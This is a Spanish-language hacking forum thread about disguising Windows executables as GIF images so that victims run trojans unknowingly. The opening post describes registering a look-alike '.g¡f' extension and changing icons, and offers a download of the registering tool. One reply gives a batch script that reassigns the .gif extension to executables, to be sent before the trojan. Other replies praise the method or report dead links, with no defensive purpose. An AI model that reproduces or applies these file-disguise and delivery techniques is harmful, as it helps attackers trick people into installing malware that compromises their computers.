Cambiar un .exe por un .gif (funciona)

[Dark Allien]

Bueno, mirando el muy buen articulo de Cyrux.net sobre las extensiones (http://cyruxnet.org/extensiones.htm) lo probe y funcionaba todo pero no hera lo suficiente bueno porque no quedaba bien.

Nota:
Para los que no leyeron el articulo se los explico rapido, pero tendrian que leerlo.
Resulta que todas las extensiones esta en el registro de Win entonces podemos crear nuestras propias extensiones ejemplo .que la pondriamos para que no la muestre como las .exe .txt .jpg, etc. y entonces todo los archivos que tenemos con la extencion .que se van a ejecutar sin problema y no van a mostrar la ext seguida del nombre como una que fuera extraña.
Termina Nota.

el problema era este,  si conseguia que me ejecutara cualquier .exe que nombrara a .que pero a la izq de la pantalla en el modo de vista "como pagina web" decia por ej: troyano.que y como lo dice Cyrux.net queda peor porque quedaria Troyano.exe.qu e y el .que no aparece abajo del icono junto con el nombre solo aparece Troyano.exe pero como sabemos los .exe tampoco aparecen solo a la izq de la pantalla entonces canta mucho eso y ni hablar de que al lado te aparezca .exe.que, en fin

probando haber como solucionaba esto me di cuenta de algo espectacular que ahi ala izq en modo como pagina web si yo ponia un simbolo de admiracion (¡) lo escribia igual que una (i) pero igual igual, entonces dije "quemero sos un genio" me di cuenta de que podia falsificar la extension .gif por .g¡f (el 1º .gif esta con i y el 2º con el signo de admiracion, hasta aca la puedo falsificar y ni se da cuenta), yendo al grano lo que logre es que cualquier .exe que nombre a .g¡f (con signo no con i latina) pasaria por una imagen pero se ejecutaria un .exe
Asi que hice un programa que agregara esta extension en el registro de Win y asi todos los .exe que le mandamos a la victima renombrados a .g¡f serian .exe que parecen imagenes.

Conclucion: le mandamos un archivo a la victima le decimos que es la tipica animacion de flash al ejecutarlo se le registra la extension y de ahi en mas le mandamos todos los troyanos y cosas que queramos renombradas a .g¡f (siempre con el signo de admiracion no con la i latina si no no funciona) y le cambiamos el icono al de una imagen gif y listo para el es una imagen al 100% y si encima con algun joiner le adjuntamos una imagen mejor.

Bueno para que no se haga mas largo les dejo el zip con:
 el .exe que al ejecutarlo registra la extension   
un .exe que tiene una animacion junto con el Ext.exe que no levanta sospechas
y otro .exe con la misma animacion pero estaves le uní un formato .swf o sea que es mucho mas liviano pero acuerdense que a la hora de verlo la victima nesecita los plugin de macromedia.
Y tambien trae el icono de las imagenes .gif par que despues se los pongan a los troyanos etc.

Acá esta el zip:  http://usuarios.lycos.es/elquemero/
esta en utilidades "Extensiones"

les recomiendo que ejecuten el Ext.exe que es el registra la extencion nueva y asi pueden ver como se le va a ver el archivo a la victima total es facil de borrar despues solo borran la carpeta .g¡f (la del signo no la original .gif) y la g¡ffile (lo mismo la del signo no la original)

By :Dark allien.

[vZor]

o le pasas un bat

Código:

@echo off
assoc .gif=exefile

lo guardas como .bat se lo pasas y luego el server y se creerá que es un gif

[Poisoned]

esta muy bueno esto...

yo anda buscando que forma psar los arcivos para que no parezca dudoza...

[nomade_55p]

Me dice q no existe, fijate di anda please...

saludos

[EAT7HERICH]

Zarpado lo del signo de admiración.
Saludos!

[slash19]

Pana q tal soy nuevo en este foro.. muy bno e ingenioso de tu parte el post.. pero tengo dudas.. xq dices q hicists un programa que agregara esta extension en el registro de Win, me puedes explicar eso...


Asi que hice un programa que agregara esta extension en el registro de Win y asi todos los .exe que le mandamos a la victima renombrados a .g¡f serian .exe que parecen imagenes.

Espero tu respuesta 

[TxShAcK]

Vi ace tiempo algo parecido, y esto si q se puede hacer, pero para q a tu victima le aparezca .gif en vez de .exe, la hay q mandar primero otro archivo q modifiq su registro no?? y apartir de ahy, podemos mandarla todas las extensiones q creemos

[JM1]

no funka no funka no funka el link amigo ponlo de nuevo no?

JM

[BaCkDoOr SnIffEr]

Hola, esta muy buena la información, muy util , pero crees poder subir tu programa a otro lado? :S que en el link que pones no se puede bajar :S

[sleep]

Zarpado lo del signo de admiración.
Saludos!

salu2 argentino ojala puedas contactarme man kisiera pedirte ayuda en algunas cosillas y veo ke eres bueno en esto mi  nick es eltraficante_1 3     en yahoo espero  ke te conectes man gracias ke estes b ien.

[darkzeith]

  me impresionas mi amigo... porque no mejor le buscas y pones algo original, solo te puedo describir como un lammer! encontre el mismo post con fecha del 2005! y con otro nombre! mui bueno pero... lammer!

Para ver este enlace Registrate o Inicia Sesion

http://www.comunidadinformatica.org/foro/index.php?topic=445.0;prev_next=prev

[criscracker]

mmmm .....no funciona el crack me sale un error....de todas formas gracias.....a ti te ha funcionado el crack????pues a mi no .....mmm...voy a buscar aver si ecuentro otro....!!!

[matrix_hc85]

me impresionas mi amigo... porque no mejor le buscas y pones algo original, solo te puedo describir como un lammer! encontre el mismo post con fecha del 2005! y con otro nombre! mui bueno pero... lammer!

Para ver este enlace Registrate o Inicia Sesion

http://www.comunidadinformatica.org/foro/index.php?topic=445.0;prev_next=prev

plop lo descubristes!!!! 

[matrix_hc85]

Vi ace tiempo algo parecido, y esto si q se puede hacer, pero para q a tu victima le aparezca .gif en vez de .exe, la hay q mandar primero otro archivo q modifiq su registro no?? y apartir de ahy, podemos mandarla todas las extensiones q creemos

exacto... habria que contaminar primero el ordenador objetivo para hacerla vulnerable recien..